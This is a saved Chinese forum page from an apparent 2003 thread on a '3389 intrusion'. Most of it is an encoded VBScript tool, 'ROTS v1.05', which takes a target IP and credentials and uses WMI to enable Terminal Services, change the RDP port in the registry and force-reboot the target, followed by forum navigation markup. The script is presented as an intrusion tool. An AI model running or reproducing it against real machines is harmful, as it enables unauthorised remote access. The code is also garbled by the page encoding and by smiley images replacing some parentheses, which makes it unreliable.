📄 一次简单的3389入侵过程.mht
字号:
objShell.Run("cmd.exe /k cscript //nologo=20
=
"&chr(34)&wscript.scriptfullname&chr(34))<BR> =20
wscript.quit<BR>end if<BR>if=20
wscript.arguments.count<3 then<BR> =20
usage()<BR> wscript.echo "Not =
enough=20
parameters."<BR> wscript.quit<BR>end =
=
if<BR><BR>ipaddress=3Dwscript.arguments(0)<BR>username=3Dwscript.argument=
s(1)<BR>password=3Dwscript.arguments(2)<BR>if=20
wscript.arguments.count>3 then<BR> =20
=
port=3Dwscript.arguments(3)<BR>else<BR> =20
port=3D3389<BR>end if<BR>if not =
isnumeric(port) or=20
port<1 or port>65000 then<BR> =20
wscript.echo "The number of port is=20
error."<BR> wscript.quit<BR>end =
if<BR>if=20
wscript.arguments.count>4 then<BR> =20
=
reboot=3Dwscript.arguments(4)<BR>else<BR> =20
reboot=3D""<BR>end=20
if<BR><BR>usage()<BR>outstreem.write "Conneting=20
"&ipaddress&" ...."<BR>set=20
=
objlocator=3Dcreateobject("wbemscripting.swbemlocator"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0><BR>set=20
=
objswbemservices=3Dobjlocator.connectserver(ipaddress,"root/cimv2",userna=
me,password)<BR>showerror(err.number)<BR>objswbemservices.security_.privi=
leges.add=20
=
23,true<BR>objswbemservices.security_.privileges.add=20
18,true<BR><BR>outstreem.write "Checking OS=20
type...."<BR>set=20
=
colinstoscaption=3Dobjswbemservices.execquery("select=20
caption from win32_operatingsystem"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0><BR>for each =
objinstoscaption=20
in colinstoscaption<BR> if=20
instr(objinstoscaption.caption,"Server"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0>>0 =
then<BR> =20
wscript.echo "OK!"<BR> =20
else<BR> =
wscript.echo "OS=20
type is "&objinstoscaption.caption<BR> =
outstreem.write "Do you want =
to=20
cancel setup?[y/n]"<BR> =20
strcancel=3Dinstreem.readline<BR> =
=20
if lcase(strcancel)<>"n" then=20
wscript.quit<BR> end=20
if<BR>next<BR><BR>outstreem.write "Writing into =
registry=20
...."<BR>set=20
=
objinstreg=3Dobjlocator.connectserver(ipaddress,"root/default",username,p=
assword).get("stdregprov"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle=20
=
border=3D0><BR>HKLM=3D&h80000002<BR>HKU=3D&h80000003<BR>with=20
objinstreg<BR>.createkey=20
=
,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"<BR>.setdwordvalue=20
=
HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0<BR>=
.createkey=20
=
HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"<BR>.setdwordvalue=20
=
HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote=
",1<BR>.setdwordvalue=20
HKLM,"SYSTEM\CurrentControlSet\Control\Terminal=20
Server","TSEnabled",1<BR>.setdwordvalue=20
=
HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2<BR>.setdwordval=
ue=20
=
HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2<BR>.setstr=
ingvalue=20
HKU,".DEFAULT\Keyboard=20
Layout\Toggle","Hotkey","1"<BR>.setdwordvalue=20
HKLM,"SYSTEM\CurrentControlSet\Control\Terminal=20
=
Server\WinStations\RDP-Tcp","PortNumber",port<BR>end=20
=
with<BR>showerror(err.number)<BR><BR>rebt=3Dlcase(reboot)<BR>flag=3D0<BR>=
if=20
rebt=3D"/r" or rebt=3D"-r" or rebt=3D"\r" then =
flag=3D2<BR>if=20
rebt=3D"/fr" or rebt=3D"-fr" or rebt=3D"\fr" =
then flag=3D6<BR>if=20
flag<>0 then<BR> =
outstreem.write "Now,=20
reboot target...."<BR> =
strwqlquery=3D"select *=20
from win32_operatingsystem where=20
primary=3D'true'"<BR> set=20
=
colinstances=3Dobjswbemservices.execquery(strwqlquery)<BR> =20
for each objinstance in =
colinstances<BR> =20
=20
objinstance.win32shutdown(flag)<BR> =20
next<BR> =20
showerror(err.number)<BR>else<BR> =20
wscript.echo "You need to reboot=20
target."&vbcrlf&"Then,"<BR>end=20
if<BR>wscript.echo "You can logon terminal =
services on=20
"&port&" later. Good =
luck!"<BR><BR>function=20
showerror(errornumber)<BR>if errornumber =
Then<BR> =20
wscript.echo "Error=20
0x"&cstr(hex(err.number))&" ."<BR> =
if err.description <> "" =
then<BR> =20
wscript.echo "Error =
description:=20
"&err.description&"."<BR> =
end=20
if<BR> =
wscript.quit<BR>else<BR> =20
wscript.echo "OK!"<BR>end if<BR>end=20
function<BR><BR>function usage()<BR>wscript.echo =
string(79,"*"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0><BR>wscript.echo =
"ROTS=20
v1.05"<BR>wscript.echo "Remote Open Terminal =
services=20
Script, by =B2=DD=D5=DC"<BR>wscript.echo =
"Welcome to visite <A=20
href=3D"http://www.5458.net/"=20
=
target=3D_blank>http://www.5458.net/</A>"<BR>wscript.echo=20
"Usage:"<BR>wscript.echo "cscript=20
"&wscript.scriptfullname&" targetIP =
username=20
password [port] [/r|/fr]"<BR>wscript.echo "port: =
default=20
number is 3389."<BR>wscript.echo "/r: auto =
reboot=20
target."<BR>wscript.echo "/fr: auto force reboot =
target."<BR>wscript.echo string(79,"*"<IMG=20
=
src=3D"http://25.20.176.12/bbs/images/smilies/wink.gif"=20
align=3DabsMiddle border=3D0>&vbcrlf<BR>end =
function<A=20
name=3Dendpid30434></A> =
</TD></TR></TBODY></TABLE></TD></TR>
<TR bgColor=3D#e8f2ff>
<TD class=3Dsmalltxt vAlign=3Dcenter><A=20
=
href=3D"http://25.20.176.12/bbs/viewthread.php?tid=3D5574#pid30434"><IMG =
alt=3D=BB=D8=B5=BD=B5=DA1=CC=F9=BF=AA=CD=B7=20
=
src=3D"http://25.20.176.12/bbs/images/default/threadforward.gif"=20
align=3DabsMiddle border=3D0></A> 2003-6-19 01:49 =
PM</A> </TD>
<TD vAlign=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" =
border=3D0>
<TBODY>
<TR class=3Dsmalltxt>
<TD align=3Dleft><A=20
=
href=3D"http://25.20.176.12/bbs/viewpro.php?username=3D"><IMG=20
alt=3D=B2=E9=BF=B4=D7=CA=C1=CF=20
=
src=3D"http://25.20.176.12/bbs/images/default/profile.gif"=20
border=3D0></A> <A=20
=
href=3D"http://25.20.176.12/bbs/search.php?srchuname=3D&srchfid=3Dall=
&srchfrom=3D0&searchsubmit=3Dyes"><IMG=20
=
alt=3D=CB=D1=CB=F7=B8=C3=D3=C3=BB=A7=B5=C4=C8=AB=B2=BF=CC=FB=D7=D3=20
=
src=3D"http://25.20.176.12/bbs/images/default/find.gif"=20
border=3D0></A> <A=20
=
href=3D"http://25.20.176.12/bbs/pm.php?action=3Dsend&username=3D"=20
target=3D_blank><IMG =
alt=3D=B7=A2=B6=CC=CF=FB=CF=A2=20
=
src=3D"http://25.20.176.12/bbs/images/default/pm.gif"=20
border=3D0></A> </TD>
<TD align=3Dright> <A=20
=
href=3D"http://25.20.176.12/bbs/post.php?action=3Dreply&fid=3D143&=
;tid=3D5574&repquote=3D30434&page=3D1"><IMG=20
alt=3D=D2=FD=D3=C3=BB=D8=B8=B4=20
=
src=3D"http://25.20.176.12/bbs/images/default/quote.gif"=20
border=3D0></A> <A=20
=
href=3D"http://25.20.176.12/bbs/misc.php?action=3Dreport&fid=3D143&am=
p;tid=3D5574&pid=3D30434"><IMG=20
=
alt=3D=CF=F2=B0=E6=D6=F7=B7=B4=D3=A6=D5=E2=B8=F6=CC=FB=D7=D3=20
=
src=3D"http://25.20.176.12/bbs/images/default/report.gif"=20
border=3D0></A> <SELECT=20
=
onchange=3D"if(this.options[this.selectedIndex].value !=3D '') =
{ window.location=3D('misc.php?action=3Dkarma&tid=3D5574&pid=3D=
30434&username=3D&score=3D'+this.options[this.selectedIndex].valu=
e+'&sid=3DKYRhJDYp') }"=20
align=3DabsMiddle name=3Dfid> <OPTION value=3D"" =
selected>=C6=C0=B7=D6</OPTION> <OPTION =
value=3D"">----</OPTION>=20
<OPTION value=3D-4>-4</OPTION> <OPTION=20
value=3D-3>-3</OPTION> <OPTION =
value=3D-2>-2</OPTION>=20
<OPTION value=3D-1>-1</OPTION> <OPTION=20
value=3D1>+1</OPTION> <OPTION =
value=3D2>+2</OPTION>=20
<OPTION value=3D3>+3</OPTION> <OPTION=20
value=3D4>+4</OPTION> <OPTION =
value=3D5>+5</OPTION></SELECT>=20
=
</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></T=
ABLE></A><A=20
name=3Dpid30661>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" =
align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD bgColor=3Ddarkblue>
<TABLE style=3D"TABLE-LAYOUT: fixed; WORD-WRAP: break-word"=20
cellSpacing=3D1 cellPadding=3D4 width=3D"100%" border=3D0>
<TBODY>
<TR bgColor=3D#e8f2cf>
<TD vAlign=3Dtop width=3D160>
<FIELDSET><LEGEND><A=20
=
href=3D"http://25.20.176.12/bbs/viewthread.php?tid=3D5574#endpid30661"><I=
MG=20
alt=3D=D7=AA=B5=BD=B5=DA2=CC=F9=C4=A9=CE=B2=20
=
src=3D"http://25.20.176.12/bbs/images/default/threadnext.gif"=20
border=3D0></A> <FONT =
title=3D"=B5=DA2=C2=A5<br>=CC=F9=D7=D3=B1=E0=BA=C5:PID=3D30661"=20
color=3D#9900ff>=B5=DA2=C2=A5</FONT> </LEGEND>
<TABLE style=3D"TABLE-LAYOUT: fixed" cellSpacing=3D0 =
cellPadding=3D0=20
width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD>
<CENTER>
=
<H3>=B0=CB=D8=D4=CD=F5</H3></CENTER><BR></TD></TR>
<TR>
<TD align=3Dmiddle><IMG=20
=
src=3D"http://25.20.176.12/bbs/images/default/star.gif"><IMG=20
=
src=3D"http://25.20.176.12/bbs/images/default/star.gif"><IMG=20
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -